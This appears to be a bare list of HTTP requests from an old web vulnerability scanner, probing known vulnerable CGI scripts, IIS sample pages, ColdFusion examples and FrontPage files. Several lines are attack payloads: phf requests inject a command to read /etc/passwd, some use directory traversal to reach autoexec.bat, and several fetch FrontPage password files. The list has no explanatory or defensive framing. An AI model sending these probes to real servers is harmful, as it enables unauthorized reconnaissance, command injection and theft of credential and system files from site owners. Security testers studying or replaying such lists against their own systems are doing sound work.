HEAD / HTTP/1.0
GET / HTTP/1.0
GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0
GET /cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd HTTP/1.0
GET /scripts/issadmin/bdir.htr HTTP/1.0
GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0
GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0
GET /cgi-bin/gH.cgi HTTP/1.0
GET /cgi-bin/phf HTTP/1.0
GET /cgi-bin/phf.pp HTTP/1.0
GET /cgi-bin/phf.cgi HTTP/1.0
GET /cgi-bin/wwwadmin.pl HTTP/1.0
GET /cgi-bin/formmail.pl HTTP/1.0
GET /cgi-bin/sendform.cgi HTTP/1.0
GET /cgi-bin/Count.cgi HTTP/1.0
GET /cgi-bin/test-cgi HTTP/1.0
GET /cgi-bin/nph-test-cgi HTTP/1.0
GET /cgi-bin/nph-publish HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php HTTP/1.0
GET /cgi-bin/php3 HTTP/1.0
GET /cgi-bin/handler HTTP/1.0
GET /cgi-bin/webgais HTTP/1.0
GET /cgi-bin/websendmail HTTP/1.0
GET /cgi-bin/webdist.cgi HTTP/1.0
GET /cgi-bin/faxsurvey HTTP/1.0
GET /cgi-bin/htmlscript HTTP/1.0
GET /cgi-bin/pfdispaly.cgi HTTP/1.0
GET /cgi-bin/perl.exe HTTP/1.0
GET /cgi-bin/wwwboard.cgi HTTP/1.0
GET /cgi-bin/wwwboard.pl HTTP/1.0
GET /cgi-bin/www-sql HTTP/1.0
GET /cgi-bin/view-source HTTP/1.0
GET /cgi-bin/campas HTTP/1.0
GET /cgi-bin/aglimpse HTTP/1.0
GET /cgi-bin/glimpse HTTP/1.0
GET /cgi-bin/man.sh HTTP/1.0
GET /cgi-bin/AT-admin.cgi HTTP/1.0
GET /cgi-bin/filemail.pl HTTP/1.0
GET /cgi-bin/maillist.pl HTTP/1.0
GET /cgi-bin/jj HTTP/1.0
GET /cgi-bin/info2www HTTP/1.0
GET /perl/files.pl HTTP/1.0
GET /cgi-bin/files.pl HTTP/1.0 
GET /cgi-bin/finger HTTP/1.0
GET /cgi-bin/bnbform.cgi HTTP/1.0
GET /cgi-bin/survey.cgi HTTP/1.0
GET /cgi-bin/AnyForm2 HTTP/1.0
GET /cgi-bin/textcounter.pl HTTP/1.0
GET /cgi-bin/classifieds.cgi HTTP/1.0
GET /cgi-bin/environ.cgi HTTP/1.0
GET /cgi-bin/wrap HTTP/1.0
GET /cgi-bin/cgiwrap HTTP/1.0
GET /cgi-bin/edit.pl HTTP/1.0
GET /cgi-bin/perlshop.cgi HTTP/1.0
GET /cgi-bin/webbbs.cgi HTTP/1.0
GET /cgi-bin/whois_raw.cgi HTTP/1.0
GET /cgi-bin/AnyBoard.cgi HTTP/1.0
GET /_vti_inf.html HTTP/1.0
GET /~root HTTP/1.0
GET /_vti_pvt/users.pwd HTTP/1.0
GET /_vti_pvt/service.pwd HTTP/1.0
GET /_vti_pvt/authors.pwd HTTP/1.0
GET /_vti_pvt/administrators.pwd HTTP/1.0
GET /_vti_pvt/shtml.dll HTTP/1.0
GET /_vti_pvt/shtml.exe HTTP/1.0
GET /cgi-dos/args.bat HTTP/1.0
GET /cgi-win/uploader.exe HTTP/1.0
GET /cgi-bin/wguest.exe HTTP/1.0
GET /cgi-bin/rguest.exe HTTP/1.0
GET /scripts/CGImail.exe HTTP/1.0
GET /scripts/tools/newdsn.exe HTTP/1.0
GET /scripts/fpcount.exe HTTP/1.0
GET /scripts/counter.exe HTTP/1.0
GET /scripts/visadmin.exe HTTP/1.0
GET /scripts/pfieffer.bat HTTP/1.0
GET /scripts/pfieffer.cmd HTTP/1.0
GET /cfdocs/expelval/openfile.cfm HTTP/1.0
GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0
GET /cfdocs/expelval/sendmail.cfm HTTP/1.0
GET /search97.vts HTTP/1.0
GET /carbo.dll HTTP/1.0
GET /?PageServices HTTP/1.0
GET /msadc/Samples/SELECTOR/showcode.asp HTTP/1.0
GET /domcfg.nsf/?open HTTP/1.0
GET /......../autoexec.bat HTTP/1.0
GET /....../autoexec.bat HTTP/1.0
GET /cgi-bin/day5datacopier.cgi HTTP/1.0
GET /cgi-bin/day5datanotifier.cgi HTTP/1.0
GET /cgi-bin/passwd  HTTP/1.0
GET /cgi-bin/passwd.txt  HTTP/1.0
GET /cgi-bin/password  HTTP/1.0
GET /cgi-bin/password.txt  HTTP/1.0
GET /session/adminlogin HTTP/1.0
GET /session/adminlogin?RCpage= HTTP/1.0
GET /cgi-bin/ax.cgi HTTP/1.0
GET /cgi-bin/ax-admin.cgi HTTP/1.0
GET /cgi-bin/unlg1.1 HTTP/1.0
GET /cgi-bin/unlg1.2 HTTP/1.0
GET /cgi-bin/rwwwshell.pl HTTP/1.0
GET /iisadmpwd/achg.htr HTTP/1.0
GET /iisadmpwd/aexp.htr HTTP/1.0
GET /iisadmpwd/aexp2.htr HTTP/1.0
GET /iisadmpwd/aexp2b.htr HTTP/1.0
GET /iisadmpwd/aexp3.htr HTTP/1.0
GET /iisadmpwd/aexp4.htr HTTP/1.0
GET /iisadmpwd/aexp4b.htr HTTP/1.0
GET /iisadmpwd/anot.htr HTTP/1.0
GET /iisadmpwd/anot3.htr HTTP/1.0
GET /_AuthChangeUrl? HTTP/1.0
GET /scripts/tools/getdrvs.exe HTTP/1.0
GET /cgi-bin/guestbook.cgi HTTP/1.0
GET /cgi-bin/jj HTTP/1.0
GET /cgi-bin/handler.cgi HTTP/1.0
GET /cgi-bin/wrap.cgi HTTP/1.0
GET /cgi-bin/pfdisplay.cgi HTTP/1.0
GET /scripts/convert.bas HTTP/1.0
GET /cgi-bin/dumpenv.pl HTTP/1.0
GET /cgi-bin/upload.pl HTTP/1.0
GET /cgi-dos/args.cmd HTTP/1.0
GET /cgi-dos/args.bat HTTP/1.0
